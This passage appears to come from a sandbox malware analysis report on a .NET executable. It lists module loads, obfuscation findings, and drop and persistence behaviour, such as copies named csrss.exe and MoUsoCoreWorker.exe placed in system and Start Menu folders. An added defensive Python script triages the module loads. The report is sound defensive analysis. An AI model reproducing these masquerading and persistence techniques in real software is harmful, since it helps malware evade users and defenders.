Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
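The module-load entries above can be turned into a quick capability triage. The script below is an added example and not part of the Joe Sandbox report: it parses lines in the report's own `Source: <process> Section loaded: <module>` form (the embedded sample is an abridged, constructed selection copied from the list above), groups modules by process, maps a handful of DLLs to capability classes (that mapping is an analyst assumption, not something the report asserts), and flags any process running outside C:\Windows that combines three or more classes. On this report that singles out the dropped binary under Program Files\Windows Portable Devices, which loads the CLR host together with DPAPI, WinHTTP, WMI and audio-session DLLs, while powershell.exe and svchost.exe load overlapping sets but from System32.

```python
import re
from collections import defaultdict

# Constructed sample in the report's own "Source: <process> Section loaded: <module>"
# format. Process paths and module names are copied from the report; the selection
# is abridged to a few representative lines, one of them with the page's link text.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: mscoree.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: dpapi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: winhttp.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: mmdevapi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: audioses.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
"""

DROPPED_EXE = r"C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe"

# Module -> capability class. This mapping is the analyst's assumption for triage,
# not a statement the report makes; extend it as needed.
CAPABILITY_OF = {
    "mscoree.dll": "managed",     # CLR host: the process runs .NET code
    "dpapi.dll": "dpapi",         # DPAPI: unwrapping browser / credential stores
    "winhttp.dll": "network",
    "wininet.dll": "network",
    "mswsock.dll": "network",
    "dnsapi.dll": "network",
    "mmdevapi.dll": "audio",      # audio-session / microphone access
    "audioses.dll": "audio",
    "winmm.dll": "audio",
    "wbemcomn.dll": "wmi",        # WMI client: hardware, AV and VM queries
    "wmidcom.dll": "wmi",
    "mi.dll": "wmi",
    "amsi.dll": "amsi",           # script content is being handed to AMSI
}

LINE_RE = re.compile(r"^Source:\s+(?P<proc>.+?)\s+Section loaded:\s+(?P<mod>\S+)", re.I)


def parse_section_loads(text):
    """Group loaded module names by process path; trailing link text is ignored."""
    loads = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            loads[m.group("proc")].add(m.group("mod").lower())
    return dict(loads)


def capabilities(modules):
    """Capability classes implied by a process's module set."""
    return {CAPABILITY_OF[m] for m in modules if m in CAPABILITY_OF}


def is_outside_windows_dir(proc):
    return not proc.lower().startswith("c:\\windows\\")


def triage(text, min_classes=3):
    """Flag processes outside C:\\Windows that combine min_classes or more capability classes."""
    findings = []
    for proc, mods in sorted(parse_section_loads(text).items()):
        caps = capabilities(mods)
        flagged = is_outside_windows_dir(proc) and len(caps) >= min_classes
        findings.append((proc, sorted(caps), flagged))
    return findings


if __name__ == "__main__":
    for proc, caps, flagged in triage(SAMPLE_LINES):
        print(("FLAG " if flagged else "     ") + proc + "  " + ",".join(caps))
```

The path rule is deliberately crude: a signed vendor tool under Program Files can load the same DLLs, so treat the flag as a prompt to check the file's signature and origin, not as a verdict on its own.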
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\ebcca32ff60686
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Windows Portable Devices\ebcca32ff60686
Source: fDTPlvsGfH.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: fDTPlvsGfH.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: fDTPlvsGfH.exe Static file information: File size 2669568 > 1048576
Source: fDTPlvsGfH.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x28b400
Source: fDTPlvsGfH.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: eC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: xC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: |C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: gC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ~C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: yC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: }C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: vC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000003796000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: kC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000003796000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Unpacked PE file: 0.2.fDTPlvsGfH.exe.2580000.4.unpack
Source: fDTPlvsGfH.exe, 1a2.cs .Net Code: ghM System.Reflection.Assembly.Load(byte[])
Source: fDTPlvsGfH.exe, 857.cs .Net Code: _736
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9B8B3CB9 push ebx; retf 0_2_00007FFD9B8B3CBA
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9BE561FB push ds; retn 5EFCh 0_2_00007FFD9BE5626F
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9BE575DD push edi; iretd 0_2_00007FFD9BE575DE
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9BE59525 push E8FFFFFFh; retf 0_2_00007FFD9BE59531
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B76D2A5 pushad ; iretd 1_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B88ADF8 push E9582DA2h; ret 1_2_00007FFD9B88AE29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B88BAC8 push E85700D7h; ret 1_2_00007FFD9B88BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B952316 push 8B485F94h; iretd 1_2_00007FFD9B95231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B75D2A5 pushad ; iretd 2_2_00007FFD9B75D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B942316 push 8B485F95h; iretd 2_2_00007FFD9B94231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B76D2A5 pushad ; iretd 4_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B952316 push 8B485F94h; iretd 4_2_00007FFD9B95231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9B77D2A5 pushad ; iretd 6_2_00007FFD9B77D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9B962316 push 8B485F93h; iretd 6_2_00007FFD9B96231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD9B78D2A5 pushad ; iretd 8_2_00007FFD9B78D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD9B972316 push 8B485F92h; iretd 8_2_00007FFD9B97231B

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File written: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\eFdBcvYu.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\KySWwqSG.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\iDXAsssK.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\UnQDGoMO.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\wiMZKnmL.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\DSloixRU.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\bXqTeyrX.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\owAZVXxy.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\aOmKVzXA.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\hMaKxNSp.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\nnwRMYdb.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\XgzcXCre.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\HFjxfdnr.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\NyMWIIsf.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\fTLbMRgr.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\JCfvgtvD.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\AZWFwAgV.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\uodzyDCn.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\hPTsHewM.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\CVKgMxCZ.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\jsvAFsni.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\OvoeeIHa.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\DYQGISGu.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\lCRBFKSi.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\RoXDuWmq.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\AhGYbjHb.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\ssViDqmS.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\AHvxDOtC.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\hGwsXsdP.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\dZcBAhwS.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\TlyLQWBk.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\WjYUBCcj.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\OygMnZlw.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\zZCPRjnE.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\TcbLgjio.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\rqDqMXbo.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\ajmLslvZ.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\wlEHTDRh.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\ICLFBdCl.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\rhfqclHr.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\qZchTloU.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\YVXcjCmC.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\uuIRZZqN.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\wacGgDMF.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\lFJjObwF.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\WKOtegOK.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\GOHxPPGn.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\LvueRqhB.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\luhiabrd.log
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\CKigYxxx.log
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\Default User\Start Menu\Programs\Accessories\csrss.exe
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\Default User\Start Menu\Programs\Accessories\886983d96e3d3e

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (20 occurrences across the powershell.exe processes)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (15 occurrences across the powershell.exe processes)
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information set: NOOPENFILEERRORBOX (50 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (38 occurrences)
